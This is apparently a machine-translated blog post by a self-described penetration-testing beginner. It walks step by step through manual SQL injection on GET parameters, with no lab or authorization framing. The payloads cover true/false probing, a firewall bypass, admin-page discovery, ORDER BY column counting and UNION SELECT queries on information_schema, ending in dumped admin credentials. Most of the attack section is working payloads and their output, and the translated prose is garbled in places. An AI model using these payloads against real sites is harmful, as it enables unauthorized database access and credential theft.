SQL Injection Learning Experience

I am a penetration novice, information security professional students have been learning about the safety of the theoretical study, the main is the construction of the site, but since the contact of the web after the penetration of the site is really flawed, and thus fell in love with the infiltration of learning, today and you share my learning results, What a bad place to welcome everyone to comment!

Today is mainly about SQL injection, the principle of SQL injection and the harm is not much to say, we can Baidu a bit, to tell you about my practical experience.

methods for SQL injection (get parameters)

That's complicated, it's useless. Two kinds of tools, injection and manual injection

(a) Choose whether the site can be SQL injection (generally using Firefox browser is better-convenient)

(1) First view the URL page for a page such as http://xxx.com/xxx/id=23 or a pseudo-static URL can also be injected.

(2) Enter after URL

and 1=1 return to the page as normal

and 1=2 return page error

or 1=1 return page error

or 1=2 return to the page as normal

This site has an injection bug.

Now the site has basically a Web site firewall (with anti-SQL injection function) can be used ' tool injection to the relay generator ' to regenerate a page (note that open this page to use IIS or a small cyclone), so that the site to bypass the security dog.

Then work on the newly generated page.

and 1=1 return to the page as normal

and 1=2 return page error

or 1=1 return page error

or 1=2 return to the page as normal

This will allow you to proceed to the next step.

(a) Personal experience should generally be scanned in the catalogue first, why?

Because the first should find the website backstage login interface, if even login interface can not find, even know the administrator's user name password and what is the use of it.

Can be found manually, is to guess the name, generally admin|login|user such as ASP, PHP, aspx, JSP suffix, this method is a bit silly, the general use of tools for Web site traversal.

Scan Tool: The tool is available in the attachment. I generally first use the Sword of the scanning tool, but the age of the sword is not small, there is no follow-up update, so some Web site directory is not able to traverse out, this is only with some of the tools. Tool Burpsuite (all said to be infiltration artifact, I have been in use, the function is very powerful, can be web crawling and Web site Directory traversal) there is Acunetix Web vulnerability scanner This software is very powerful, now out to 10, Online hack version. For the specific use of the tutorial please Baidu.

(ii) to inject

Available tools Ah D, Ming boy, Pangolin pangolin, sqlmap and other tools to inject, today mainly to explain the manual injection.

Manual injection:

1. Order BY 1.....100 judgment table number

If the page returns to normal then this number is less than the number of tables, in turn sliding scale, preferably in the test to save time, the last correct table number, such as 20 normal, 21 is not normal, the number of tables is 20

2, http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 , 15,16,17,18,19,20

Show 3,7 numbers

3. Replace 3 or 7 with database (), version (), user (), @ @version--compile_os

Basic information (1) database (): name-------ABC

(2) version (): Database version--------5.1.63-community

(3) User (): database user [email protected]

(4) @ @version--compile_os: Operating system--------Win32

4. Table name Query http://xxx/xxx.php?id=23 and 1=2 UNION SELECT 1,2,GROUP_CONCAT (table_name), 4,5,6,7,8,9          , 10,11,12,13,14,15,16,17,18,19,20from Information_schema.tables where table_schema=0x616263 (here is the database name, available in small Kwai Conversion tool to hex value)

The result of the query is: Wz_jj_admin,wz_jj_article,wz_jj_attachment,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_ Attachment,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message

5, Analysis table wz_jj_admin lookup table column name

Http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat (column_name), 4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20 from Information_schema.columns where table_name=0x777a5f6a6a5f61646d696e

The result is: UID, Ad_username,ad_password,ad_power,ad_intro

6. Find user name, password http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat (Ad_username,0x5c,ad_password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from Wz_jj_admin

7, the result is: admin admin888 this is successful

This is just a simple SQL injection, followed by the parameters injected with post injection, cookie injection, please wait patiently!

SQL Injection Learning Experience